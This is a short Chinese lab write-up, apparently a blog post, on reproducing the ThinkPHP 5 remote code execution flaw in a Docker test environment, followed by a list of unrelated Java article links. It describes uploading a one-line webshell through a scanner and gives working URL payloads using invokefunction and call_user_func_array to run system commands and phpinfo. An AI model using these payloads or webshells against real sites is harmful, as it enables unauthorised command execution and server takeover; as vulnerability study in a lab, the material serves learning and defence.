常见框架漏洞—Thinkphp

1.搭建环境

cd /www/wwwroot/thinkphp/5-rce/

docker-compose up -d

2.访问我们搭建的环境

3.复制网站url到蓝鲸去测试漏洞

发现了两个漏洞

其中一个得到了一些信息

另一个漏洞我们在getshell中输入一句话木马,然后getshell,给我们生成了一个文件并上传到了文件,然后我们尝试访问

4.访问成功,然后我们传参

执行成功!

5.在url中输入:

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

可以执行我们的系统命令

6.输入;

?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

可以执行我们的代码

相关推荐
nlog3n4 分钟前
分布式计数器系统完整解决方案
java·分布式
ytadpole7 分钟前
Java并发编程:从源码分析ThreadPoolExecutor 的三大核心机制
java·面试
Aevget11 分钟前
「Java EE开发指南」用MyEclipse开发的EJB开发工具(一)
java·ide·java-ee·myeclipse
TanYYF17 分钟前
Spring Boot 异步处理框架核心源码解析及实现原理
java·spring boot·spring
百锦再26 分钟前
从 .NET 到 Java 的转型指南:详细学习路线与实践建议
android·java·前端·数据库·学习·.net·数据库架构
z晨晨29 分钟前
互联网大厂Java求职面试场景
java·redis·spring·面试·多线程·互联网大厂
方圆想当图灵1 小时前
深入浅出 gRPC
java·后端·github
卷Java1 小时前
uni-app 模板语法修复说明
java·数据库·spring boot·uni-app·mybatis
渣哥1 小时前
新手最容易忽略!Spring 自动装配的 5 种方式全解析
java
库库8391 小时前
Java微服务知识点详细总结
java·开发语言·微服务